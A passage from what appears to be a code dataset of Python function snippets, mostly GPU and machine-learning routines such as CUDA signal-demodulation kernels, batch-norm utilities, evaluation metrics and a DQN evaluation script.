self.GPU_buffers.append(self.GPU_bufCodeAndPhase)\n self.GPU_bufCodeAndPhaseResult = cuda.mem_alloc(np.float32().nbytes*3) # holds [index of max (offset complensated), argument of max (normalized), value of max]\n self.GPU_buffers.append(self.GPU_bufCodeAndPhaseResult)\n \n ## fft Plan\n self.fftPlan_codeRate_R2C = cufft.cufftPlan1d(self.Nfft,cufft.CUFFT_R2C,1) # R2C, 1 batch\n self.GPU_fftPlans.append(self.fftPlan_codeRate_R2C)\n\n ## CUDA kernels\n self.GPU_sumXCorrBuffMasks = self.CudaKernels.get_function('sumXCorrBuffMasks').prepare('PPi')\n self.GPU_findCodeRateAndPhase = self.CudaKernels.get_function('findCodeRateAndPhase').prepare('PPii')\n ## constants\n self.symsTolLow = 0.9*self.spsym # Ignore low symbol rates. avoids locking onto harmonics\n self.symsTolHigh = 1.1*self.spsym # Ignore high symbol rates (avoids false results due to slow noise and DC)\n\n self.codeRateAndPhaseOffsetLow = int(self.Nfft/self.symsTolLow)\n self.codeRateAndPhaseOffsetHigh = int(self.Nfft/self.symsTolHigh)\n ## numpy buffers\n self.__CodeRateAndPhaseResult = np.empty(3,dtype=np.float32) # holds [index of max (offset complensated), argument of max (normalized), value of max]", "def calc(self):\n self.proc_blocks = [cluster.cells for cluster in self.clusters]\n self.cell_loads = [sum([len(cell) for cell in self.proc_blocks])]\n self.particle_loads = [cluster.np for cluster in self.clusters]\n self.imbalance = LoadBalancer.get_load_imbalance(self.particle_loads)", "def __initializeKernels(self):\n # FFT plans:\n self.__initializeDopplerIfftPlan() # for Doppler Ifft\n self.__initializeDemodIfftPlan() # for demod \n self.__initializeSNRFftPlan() # for findSNR\n \n # GPU kernels\n kernel = self.CudaKernels\n ## kernels for initialization\n self.GPU_multInputVectorWithMasks = kernel.get_function('multInputVectorWithMasks').prepare('PPP')\n \n self.GPU_complexConj = kernel.get_function('complexConj').prepare('P')\n self.GPU_scaleComplexByScalar = kernel.get_function('scaleComplexByScalar').prepare('Pf')\n self.GPU_setComplexArrayToZeros = kernel.get_function('setComplexArrayToZeros').prepare('P')\n \n ## kernels for doppler search\n self.GPU_filterMasks = kernel.get_function('multInputVectorWithShiftedMasksDopp').prepare('PPPPii')\n # for multInputVectorWithShiftedMasks\n self.numBlocks = self.Nfft/self.numThreads\n self.bShapeVecMasks = (int(self.numThreads),1,1)\n self.gShapeVecMasks = (int(self.numBlocks),1)\n assert self.bShapeVecMasks[0]*self.gShapeVecMasks[0]==self.Nfft,'Dimension mismatch'\n\n self.GPU_absSumDoppler = kernel.get_function('blockAbsSumAtomic').prepare('PPi')\n # for the absSumKernel to sum the rows together\n self.bShapeAbsSum = (128,1,1) # 128 and 2 in next line is just picked TODO: should be config val\n self.gShapeAbsSum = (2,int(self.doppIdxArrayLen)) # tweak these\n\n assert self.Nfft % self.bShapeAbsSum[0]*self.gShapeAbsSum[0] == 0,'Nfft has to be dividable by block and grid dimensions'\n\n self.GPU_estDoppler = kernel.get_function('findDopplerEst').prepare('PPPii')\n # for the small kernel that finds the doppler\n self.bShapeDopp = (self.num_masks,1,1)\n self.gShapeDopp = (1,1)\n\n self.GPU_setArrayToZeros = kernel.get_function('setArrayToZeros').prepare('P')\n # for the set to zero kernel for the sum\n self.bShapeZero = (int(self.num_masks),1,1)\n self.gShapeZero = (int(self.doppIdxArrayLen),1)\n\n ## for demodulation\n self.bShapeVecMasks2 = (int(256),1,1) ## 256 is just picked, TODO: should be config val\n self.gShapeVecMasks2 = (int(self.Nfft/self.bShapeVecMasks2[0]),1)\n self.complexShiftMulMasks = kernel.get_function('multInputVectorWithShiftedMask').prepare('PPPi')\n self.complexHeterodyne = kernel.get_function('complexHeterodyne').prepare('PPfffi')\n self.findcentres = kernel.get_function('findCentres').prepare('PPPPffii')\n self.bShapeCentres = (256,1,1) ## 256 is just picked, TODO: should be config val", "def update(self, rxn_probs):\n pass", "def compute(self) -> Tensor:\n\n if self.samples:\n return self.average_precisions.float() / self.total\n else:\n # pred_image_indices = torch.cat(self.pred_image_indices, dim=0)\n pred_probs = torch.cat(self.pred_probs, dim=0)\n pred_labels = torch.cat(self.pred_labels, dim=0)\n pred_bboxes = torch.cat(self.pred_bboxes, dim=0)\n\n # target_image_indices = torch.cat(self.target_image_indices, dim=0)\n target_labels = torch.cat(self.target_labels, dim=0)\n target_bboxes = torch.cat(self.target_bboxes, dim=0)\n\n # pred_index = torch.nonzero((pred_labels == 1))\n # pred_probs = pred_probs[pred_index]\n # pred_bboxes = pred_bboxes[pred_index]\n # target_index = torch.nonzero((target_labels == 1))\n # target_bboxes = target_bboxes[target_index]\n\n\n # _, index_sorted = torch.sort(pred_probs)\n # pred_bboxes = pred_bboxes[index_sorted].cpu().detach().numpy()\n # target_bboxes = target_bboxes.cpu().detach().numpy()\n pred_probs = pred_probs.cpu().detach().numpy()\n pred_labels = pred_labels.cpu().detach().numpy()\n pred_bboxes = pred_bboxes.cpu().detach().numpy()\n target_labels = target_labels.cpu().detach().numpy()\n target_bboxes = target_bboxes.cpu().detach().numpy()\n\n pred_probs = pred_probs[pred_labels == 1]\n pred_bboxes = pred_bboxes[pred_labels == 1]\n target_bboxes = target_bboxes[target_labels == 1]\n\n preds_sorted_idx = np.argsort(pred_probs)[::-1]\n pred_bboxes = pred_bboxes[preds_sorted_idx]\n\n x, y = calculate_precision_recall(target_bboxes, pred_bboxes)\n\n if len(x) >= 2:\n return auc(x, y)\n else:\n return 0\n\n # return mean_average_precision(\n # pred_image_indices,\n # pred_probs,\n # pred_labels,\n # pred_bboxes,\n # target_image_indices,\n # target_labels,\n # target_bboxes,\n # self.iou_threshold,\n # self.ap_calculation,\n # )", "def reset_bn_stats(model):\n for m in model.modules():\n if isinstance(m, torch.nn.BatchNorm2d):\n m.reset_running_stats()", "def update_bn_stats(\n model: nn.Module,\n data_loader: Iterable[Any],\n num_iters: int = 200,\n by_epoch: bool = False):\n bn_layers = get_bn_modules(model)\n\n if len(bn_layers) == 0:\n return\n\n momentum_actual = [bn.momentum for bn in bn_layers]\n for bn in bn_layers:\n bn.momentum = 1.0\n\n running_mean = [\n torch.zeros_like(bn.running_mean) for bn in bn_layers\n ]\n running_var = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n\n if by_epoch:\n num_iters = num_iters * len(data_loader)\n\n iter_loader = IterLoader(data_loader)\n ind = -1\n with tqdm(total=num_iters) as pbar:\n pbar.set_description('Calculating running stats')\n while ind < num_iters:\n data_batch = next(iter_loader)\n output = model(data_batch['img'])\n\n ind += 1\n for i, bn in enumerate(bn_layers):\n running_mean[i] += (bn.running_mean - running_mean[i]) / (ind + 1)\n running_var[i] += (bn.running_var - running_var[i]) / (ind + 1)\n\n pbar.update(1)\n\n assert ind == num_iters, (\n \"update_bn_stats is meant to run for {} iterations, \"\n \"but the dataloader stops at {} iterations.\".format(num_iters, ind)\n )\n\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_mean[i]\n bn.running_var = running_var[i]\n bn.momentum = momentum_actual[i]", "def main():\n\n # Create an empty array to hold our points.\n n = gpuarray.zeros(shape=(x, y, z),\n dtype=gpuarray.vec.float3)\n\n # Populate the array with randomized points from the search space.\n for k in range(z):\n for j in range(y):\n for i in range(x):\n n[i, j, k] = gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-depth, depth))\n\n # Declare our elementwise CUDA kernel.\n mod = Elementwise(\n arguments=\"float3 pt, float3 *ns, float *rs\",\n operation=\"rs[i] = sqrt(pow(pt.x-ns[i].x,2)+pow(pt.y-ns[i].y,2)+pow(pt.z-ns[i].z,2))\",\n name=\"euclidean_distance\",\n preamble=\"#include <math.h>\"\n )\n\n # Declare an empty results array.\n r = gpuarray.zeros(shape=(50, 50, 2), dtype=numpy.float32)\n start = cuda.Event()\n end = cuda.Event()\n start.record()\n # Call the kernel with a randomize point from the search space.\n mod(gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-width, width)), n, r)\n end.record()\n end.synchronize()\n print((start.time_till(end)))\n print(r)", "def calcError(net, net_labels, dataset_name, dataloader, dataset, doGPU):\n # note: net_labels is a list of pairs (RAP_name, PETA_name) of attribute names\n net_attr_nbr = len(net_labels)\n assert (net_attr_nbr == 49)\n \n total = 0\n correct = 0\n batch_nbr = 0\n per_attrib_total = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_correct = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_1_pred = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_class_accuracy = torch.zeros([net_attr_nbr], dtype=torch.float) # size [92]\n if doGPU:\n per_attrib_total = per_attrib_total.cuda()\n per_attrib_correct = per_attrib_correct.cuda()\n per_attrib_1_pred = per_attrib_1_pred.cuda()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cuda()\n \n with torch.no_grad():\n # loop over batches\n # accumulate per-attribute and total number of correct predictions\n for i_batch, sample_batched in enumerate(dataloader):\n assert (sample_batched['image'].shape[1:] == (3,128,48)), \"wrong image size\"\n batch_nbr += 1\n real_batch_size = sample_batched['image'].shape[0]\n total += real_batch_size * net_attr_nbr\n per_attrib_total += real_batch_size # size [net_attr_nbr]\n assert (per_attrib_total.sum().item() == total)\n try:\n assert (batch_nbr == math.ceil(per_attrib_total[0].item()/Param_Batchsize))\n except AssertionError:\n ipdb.set_trace()\n pass\n\n\n # prepare data for prediction\n if doGPU:\n inp = Variable(sample_batched['image'].float().cuda())\n else:\n inp = Variable(sample_batched['image'].float())\n\n # retrieve ground truth\n dataset_lab_gt = sample_batched['label'] # shape == [50,NB_ATTRIB]\n\n # convert ground truth to model attributes\n if dataset_name == 'datasetRAPPETA':\n assert (dataset_lab_gt.shape[1] == 49)\n # no conversion needed, use ground truth as it is\n lab_gt = dataset_lab_gt\n elif dataset_name == 'datasetRAP':\n assert (dataset_lab_gt.shape[1] == 92)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_RAP = [rap_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_RAP):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n elif dataset_name == 'datasetPETA':\n assert (dataset_lab_gt.shape[1] == 104)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_PETA = [peta_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_PETA):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n else:\n print('Unknown dataset \\'' + dataset_name + '\\'')\n sys.exit(1)\n\n # 'format' ground truth for Torch\n lab_gtv = Variable(lab_gt)\n if doGPU:\n lab_gtv = lab_gtv.cuda()\n\n # do prediction\n logits = net.forward(inp) # output without Sigmoid\n predictions = (logits > 0).int() # size [50, net_attr_nbr]\n assert (net_attr_nbr == predictions.shape[1])\n\n # accumulate total number of correct predictions\n correct += (lab_gtv == predictions).sum()\n\n # accumulate per-attribute number of correct predictions\n per_batch_and_attrib_correct = (lab_gtv == predictions) # size [50, net_attr_nbr]\n #if doGPU:\n # per_batch_and_attrib_correct = per_batch_and_attrib_correct.cpu()\n per_attrib_correct += per_batch_and_attrib_correct.sum(0) # size [net_attr_nbr]\n assert (per_attrib_correct.sum().item() == correct)\n\n # accumulate number of 1 predictions for each attribute\n per_attrib_1_pred += predictions.sum(0) # size [net_attr_nbr]\n\n # accumulate for class-accuracy\n per_batch_and_attrib_1_good_prediction = (predictions.byte() * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_good_prediction = ((1 - predictions.byte()) * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n assert torch.equal(per_batch_and_attrib_1_good_prediction + per_batch_and_attrib_0_good_prediction, per_batch_and_attrib_correct.sum(0))\n per_batch_and_attrib_1_ground_truth = lab_gtv.sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_ground_truth = (1 - lab_gtv).sum(0) #size [net_attr_nbr]\n try:\n assert torch.equal(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth, torch.tensor([real_batch_size] * net_attr_nbr).cuda())\n except AssertionError:\n print(\"per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth=\")\n print(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth)\n ipdb.set_trace()\n pass\n\n per_batch_and_attrib_recall_1 = per_batch_and_attrib_1_good_prediction.float() / per_batch_and_attrib_1_ground_truth.float() #size [net_attr_nbr]\n # nan values appear when ground_truth number of 1 value is 0\n # in this case, good_prediction can not be different of 0\n # (there can not be a good prediction of 1 because there is not\n # any 1 in the ground truth)\n # so a nan appears only when recall = 0 good pred / 0 case in ground truth\n # so recall=nan can be safely replaced by a recall=1\n person.replace_nan_by_one(per_batch_and_attrib_recall_1)\n per_batch_and_attrib_recall_0 = per_batch_and_attrib_0_good_prediction.float() / per_batch_and_attrib_0_ground_truth.float() #size [net_attr_nbr]\n person.replace_nan_by_one(per_batch_and_attrib_recall_0)\n # class_accuracy = mean(recall_of_0, recall_of_1)\n per_batch_and_attrib_class_accuracy = (per_batch_and_attrib_recall_0 + per_batch_and_attrib_recall_1) / 2.0 #size [net_attr_nbr]\n per_attrib_class_accuracy += per_batch_and_attrib_class_accuracy #size [net_attr_nbr]\n\n assert (total == (dataloader.dataset.__len__() * net_attr_nbr))\n \n if doGPU:\n per_attrib_total = per_attrib_total.cpu()\n per_attrib_correct = per_attrib_correct.cpu()\n per_attrib_1_pred = per_attrib_1_pred.cpu()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cpu()\n\n # compute per-attribute and global average prediction error\n err = (1.0-correct.item()/total)\n per_attrib_err = (1.0 - (per_attrib_correct.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float))) # size [net_attr_nbr]\n np.testing.assert_allclose(per_attrib_err.mean().item(), err, rtol=1e-5)\n\n # compute per-attribute number of 1 predictions\n per_attrib_1_pred_rate = 100 * (per_attrib_1_pred.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float)) # size [net_attr_nbr]\n\n # compute mean class_accuracy over batches\n per_attrib_class_accuracy = per_attrib_class_accuracy * 1.0 / batch_nbr \n\n return err, per_attrib_err, per_attrib_1_pred_rate, per_attrib_class_accuracy", "def __call__(self, epoch, update):\n ii=1\n count = 0\n list = []\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n while True:\n i, p = next(self.gen)\n if p.poll():\n grads = []\n for i, fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs * 4)\n grads.append(np.ndarray(self.shapes[i], np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv()\n\n count += 1\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n staleness = update - last_update\n else:\n ii += 1\n if ii % self.learners == 0:\n time.sleep(0.0001)\n if count == self.num:\n binning = 0\n for i in self.bins:\n if staleness >= i:\n binning += 1\n else:\n break\n self.bin_counts[binning] += 1\n logger.debug(\"staleness\", staleness, \"put in bin\", binning, flush=True)\n return gradients_list, from_list, global_update_list, step_list, metrics_list, binning, 2", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def findCodeRateAndPhaseGPU(self):\n\n # Abs**2 sum all Masks \n self.GPU_sumXCorrBuffMasks.prepared_call(self.grid_codeXCorrSum,self.block_codeXCorrSum,\n self.GPU_bufCodeAndPhase,self.GPU_bufXcorr,np.int32(self.Nfft))\n\n # fft real to complex in-place output is Nfft/2*complex64 input is Nfft*float32\n cufft.cufftExecR2C(self.fftPlan_codeRate_R2C,int(self.GPU_bufCodeAndPhase),int(self.GPU_bufCodeAndPhaseOut))\n\n # find the code rate from the magnitude and phase from the argument\n\n self.GPU_findCodeRateAndPhase.prepared_call(self.grid_codeMax, self.block_codeMax,\n self.GPU_bufCodeAndPhaseResult,self.GPU_bufCodeAndPhaseOut,np.int32(self.codeRateAndPhaseOffsetHigh),np.int32(self.codeRateAndPhaseOffsetLow-self.codeRateAndPhaseOffsetHigh))\n\n if log.level == logging.DEBUG:\n log.debug(f'Code rate index: low {self.codeRateAndPhaseOffsetLow}\\t high {self.codeRateAndPhaseOffsetHigh}')\n cuda.memcpy_dtoh(self.__CodeRateAndPhaseResult,self.GPU_bufCodeAndPhaseResult)\n\n\n try:\n # compute symbol rate\n spSym = self.Nfft/self.__CodeRateAndPhaseResult[0]\n\n except:\n log.error(self.__CodeRateAndPhaseResult)\n log.error('Code rate result 0 should not happen but happened -- fixing it to 10')\n spSym = 10\n \n \n try:\n # compute codeOffset\n codeOffset = -self.__CodeRateAndPhaseResult[1]/np.pi*spSym/2 #\n if codeOffset < 0: # wrap negative values\n codeOffset += spSym - 1\n except:\n log.warning('Error while computing code offset: codeOffset from GPU {}, index {}, max val {}'.format(self.__CodeRateAndPhaseResult[1],self.__CodeRateAndPhaseResult[0],self.__CodeRateAndPhaseResult[2]))\n codeOffset = 0\n\n return spSym, codeOffset", "def conv_bn_relu_forward(x, w, b, gamma, beta, conv_param, bn_param):\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n an, sbn_cache = spatial_batchnorm_forward(a, gamma, beta, bn_param)\n out, relu_cache = relu_forward(an)\n cache = (conv_cache, sbn_cache, relu_cache)\n return out, cache", "def collect_via_pynvml(self, stats_config):\n try:\n NVML_TEMPERATURE_GPU = 0\n pynvml.nvmlInit()\n device_count = pynvml.nvmlDeviceGetCount()\n\n for device_index in xrange(device_count):\n handle = pynvml.nvmlDeviceGetHandleByIndex(device_index)\n memoryInfo = pynvml.nvmlDeviceGetMemoryInfo(handle)\n utilizationRates = pynvml.nvmlDeviceGetUtilizationRates(handle)\n\n metrics = {\n 'memory.total': memoryInfo.total / 1024 / 1024,\n 'memory.used': memoryInfo.total / 1024 / 1024,\n 'memory.free': memoryInfo.free / 1024 / 1024,\n 'utilization.gpu': utilizationRates.gpu,\n 'utilization.memory': utilizationRates.memory,\n 'temperature.gpu':\n pynvml.nvmlDeviceGetTemperature(handle,\n NVML_TEMPERATURE_GPU)\n }\n\n for stat_name in stats_config[1:]:\n metric = metrics.get(stat_name)\n if metric:\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(device_index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)\n finally:\n pynvml.nvmlShutdown()", "def bn_update(loader, model):\n if not check_bn(model):\n return\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n for input, _ in loader:\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n b = input_var.data.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n model(input_var)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))", "def get_distribution(self):\n self.calc()\n proc_blocks = self.proc_blocks\n proc_num_particles = self.particle_loads\n cell_proc = LoadBalancer.get_block_proc(proc_blocks=proc_blocks)\n return cell_proc, proc_num_particles", "def _check_PSNR(self, dataset, is_test=False):\n\n # process one image per iter for test phase\n if is_test:\n batch_size = 1\n else:\n batch_size = 1 # self.batch_size\n\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=1)\n\n avr_psnr = 0\n avr_ssim = 0\n\n # book keeping variables for test phase\n psnrs = [] # psnr for each image\n ssims = [] # ssim for each image\n proc_time = [] # processing time\n outputs = [] # output for each image\n names = []\n\n for batch, sample in enumerate(dataloader):\n input_batch, label_batch, name = sample['lr'], sample['hr'], sample['im_name']\n\n # Wrap with torch Variable\n input_batch, label_batch = self._wrap_variable(input_batch,\n label_batch,\n self.use_gpu)\n\n if is_test:\n start = time.time()\n if self.model_name in ['TDAN']:\n output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = forward_x8(input_batch, self.model).unsqueeze(0)\n #print(output_batch.size())\n # _, lrs = self.model(input_batch)\n # output_batch = lrs[:, -1, :, :, :]\n else:\n output_batch = self.model(input_batch)\n elapsed_time = time.time() - start\n else:\n if self.model_name in ['TDAN']:\n #output_batch, _ = self.model(input_batch)\n output_batch = chop_forward(input_batch, self.model, 4)\n else:\n output_batch = self.model(input_batch)\n # ssim is calculated with the normalize (range [0, 1]) image\n ssim = pytorch_ssim.ssim(output_batch + 0.5, label_batch + 0.5, size_average=False)\n ssim = torch.sum(ssim.data)\n avr_ssim += ssim\n\n # calculate PSRN\n output = output_batch.data\n label = label_batch.data\n\n output = (output + 0.5) * 255\n label = (label + 0.5) * 255\n\n output = quantize(output, 255)\n label = quantize(label, 255)\n # diff = input - target\n\n output = output.squeeze(dim=0)\n label = label.squeeze(dim=0)\n\n psnr = self._comput_PSNR(output / 255.0, label / 255.0)\n # print(psnr)\n avr_psnr += psnr\n\n # save psnrs and outputs for statistics and generate image at test time\n if is_test:\n psnrs.append(psnr)\n ssims.append(ssim)\n proc_time.append(elapsed_time)\n np_output = output.cpu().numpy()\n outputs.append(np_output)\n names.append(name)\n\n epoch_size = len(dataset)\n avr_psnr /= epoch_size\n avr_ssim /= epoch_size\n stats = (psnrs, ssims, proc_time)\n\n return avr_psnr, avr_ssim, stats, outputs, names", "def fast_rcnn_detection(self):\n\n\n # (batch_size, num_proposal, 7, 7, channels)\n pooled_feature = self.get_rois(self.rpn_proposals_boxes)\n fast_rcnn_predict_boxes, fast_rcnn_predict_scores = self.fast_rcnn_net(pooled_feature, False)\n\n with tf.variable_scope(\"fast_rcnn_detection\"):\n\n fast_rcnn_softmax_scores = slim.softmax(fast_rcnn_predict_scores) # [-1, num_classes]\n\n # gain the highest category and score and bounding box\n fast_rcnn_categories = tf.argmax(fast_rcnn_softmax_scores, axis=2, output_type=tf.int32) # (N,)\n row_index = tf.range(0, tf.shape(fast_rcnn_categories)[1])\n row_index = tf.expand_dims(row_index, 0)\n multi_row_index = tf.tile(row_index, [self.config.PER_GPU_IMAGE, 1])\n multi_row_index = tf.expand_dims(multi_row_index, axis=-1)\n expand_fast_rcnn_categories = tf.expand_dims(fast_rcnn_categories, axis=-1)\n index = tf.concat([multi_row_index, expand_fast_rcnn_categories], axis=-1)\n fast_rcnn_categories_bboxs = boxes_utils.batch_slice([fast_rcnn_predict_boxes, index],\n lambda x, y: tf.gather_nd(x, y),\n self.config.PER_GPU_IMAGE)\n\n fast_rcnn_categories_scores = tf.reduce_max(fast_rcnn_softmax_scores, axis=2, keepdims=False)# (N,)\n\n detections = self.fast_rcnn_proposals(self.rpn_proposals_boxes,\n fast_rcnn_categories_bboxs,\n fast_rcnn_categories,\n fast_rcnn_categories_scores,\n self.window)\n\n return detections", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(\n individual_losses, params, concat=True\n )\n hist, edges = self._compute_histogram(individual_gradients)\n\n return {\"hist\": hist.float(), \"edges\": edges}", "def precompute_scoring():\n global volume_void_inclusion\n global attract_point_distances\n global perlin_values\n \n volume_void_inclusion = []\n for i,void in enumerate(volumes_void):\n inclusion = gh.PointInBrep(void,points_input,False)\n volume_void_inclusion.append(inclusion)\n \n attract_point_distances = []\n for i,point in enumerate(points_attractor):\n distances = gh.Division(gh.Distance(point,points_input),max_dist)\n attract_point_distances.append(distances)", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1,\n model='resnet50',\n num_warmup_batches=5,\n num_batches=50,\n distortions=False,\n forward_only=True,\n device='cpu',\n data_format='NHWC',\n num_intra_threads=0)", "def __init__process(self, n_cpu):\n global shared_slices\n global shared_data\n\n shared_slices_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_slices = np.frombuffer(shared_slices_base)\n shared_slices = shared_slices.reshape((len(self._q.R), -1))\n\n shared_grad_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_grad = np.frombuffer(shared_grad_base)\n shared_grad = shared_grad.reshape((len(self._q.R), -1))\n\n shared_data_base = mp.Array(ctypes.c_double,\n self._data.size,\n lock=False)\n shared_data = np.ctypeslib.as_array(shared_data_base)\n shared_data = shared_data.reshape(self._data.shape)\n shared_data[:] = self._data\n\n self._pool = mp.Pool(n_cpu)", "def main():\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True # pylint: disable=E1101\n\n comm = MPI.COMM_WORLD\n\n # Use MPI for parallel evaluation\n rank = comm.Get_rank()\n size = comm.Get_size()\n\n env_fns, env_names = create_eval_envs()\n\n env = AllowBacktracking(env_fns[rank](stack=False, scale_rew=False))\n env = BatchedFrameStack(BatchedGymEnv([[env]]), num_images=4, concat=False)\n with tf.Session(config=config) as sess:\n dqn = DQN(*rainbow_models(sess,\n env.action_space.n,\n gym_space_vectorizer(env.observation_space),\n min_val=-200,\n max_val=200))\n player = NStepPlayer(BatchedPlayer(env, dqn.online_net), 3)\n optimize = dqn.optimize(learning_rate=1e-4)\n sess.run(tf.global_variables_initializer())\n\n reward_hist = []\n total_steps = 0\n def _handle_ep(steps, rew, env_rewards):\n nonlocal total_steps\n total_steps += steps\n reward_hist.append(rew)\n if total_steps % 1 == 0:\n avg_score = sum(reward_hist[-100:]) / len(reward_hist[-100:])\n\n\t\t\t# Global Score\n global_score = np.zeros(1)\n local_score = np.array(avg_score)\n print(\"Local Score for \" + env_names[rank] + \" at episode \" + str(len(reward_hist)) + \" with timesteps: \" + str(total_steps) + \": \" + str(local_score))\n comm.Allreduce(local_score, global_score, op=MPI.SUM)\n global_score /= size\n if rank == 0:\n print(\"Global Average Score at episode: \" + str(len(reward_hist)) + \": \" + str(global_score))\n\n\n dqn.train(num_steps=2000000, # Make sure an exception arrives before we stop.\n player=player,\n replay_buffer=PrioritizedReplayBuffer(500000, 0.5, 0.4, epsilon=0.1),\n optimize_op=optimize,\n train_interval=1,\n target_interval=8192,\n batch_size=32,\n min_buffer_size=20000,\n handle_ep=_handle_ep,\n save_interval=None,\n restore_path='./checkpoints_rainbow/model-10' # Model to be evaluated\n )", "def collect_via_nvidia_smi(self, 